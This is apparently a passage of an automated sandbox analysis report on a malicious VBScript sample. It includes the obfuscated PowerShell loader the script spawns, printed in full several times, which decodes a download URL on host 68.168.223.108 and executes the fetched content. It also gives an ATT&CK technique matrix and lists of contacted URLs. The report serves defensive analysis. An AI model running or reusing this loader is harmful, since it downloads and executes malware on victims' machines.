ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigtJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigt
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigt
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information321
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		321
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive11
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell          		Login HookLogin Hook1
          Obfuscated Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Agterdelen.vbs0%ReversingLabs
          SAMPLE100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://68.168.223.108/JD/Gossipers.t0%Avira URL Cloudsafe
          http://68.168.220%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossi0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers.0%Avira URL Cloudsafe
          http://68.168.H0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Goss0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers.tocXR0%Avira URL Cloudsafe
          http://68.10%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipe0%Avira URL Cloudsafe
          http://68.168.223.0%Avira URL Cloudsafe
          http://68.168.20%Avira URL Cloudsafe
          http://68.168.223.1080%Avira URL Cloudsafe
          http://68.168.223.100%Avira URL Cloudsafe
          http://68.160%Avira URL Cloudsafe
          http://68.168.0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Go0%Avira URL Cloudsafe
          http://68.1680%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers.to0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gos0%Avira URL Cloudsafe
          http://68.168.223.108/J0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossiper0%Avira URL Cloudsafe
          http://68.168.223.108/0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers.toc0%Avira URL Cloudsafe
          http://68.168.223.10%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossipers.tocP0%Avira URL Cloudsafe
          http://68.168.2230%Avira URL Cloudsafe
          http://68.168.223.108/JD/0%Avira URL Cloudsafe
          http://68.168.223.108/JD0%Avira URL Cloudsafe
          http://68.168.223.108/JD/Gossip0%Avira URL Cloudsafe
          http://68.168.223.108/JD/G0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.210.172
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://68.168.223.108/JD/Gossipers.tocfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://68.168.223.108/JD/Gossipers.tpowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://68.168.223.108/JD/Gossiperspowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://68.168.223.108/JD/Gossipowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://68.168.22powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://68.168.Hpowershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microsoft.copowershell.exe, 00000005.00000002.1403411874.000001D1BD0B0000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://68.168.223.108/JD/Gossipers.powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://68.1powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://68.168.223.108/JD/Gossipepowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://68.168.223.108/JD/Gossipers.tocXRpowershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://68.168.223.108/JD/Gosspowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://68.168.2powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://68.168.223.powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://68.168.223.10powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://68.168.223.108powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://68.168.powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://68.16powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://68.168.223.108/JD/Gopowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://68.168.223.108/JD/Gossipers.topowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168.223.108/JD/Gospowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168.223.108/JD/Gossiperpowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168.223.108/powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168.223.108/Jpowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://68.168.223.108/JD/Gossippowershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://aka.ms/pscore68powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://68.168.223.1powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://68.168.223.108/JD/Gossipers.tocPpowershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://68.168.223powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://68.168.223.108/JD/powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
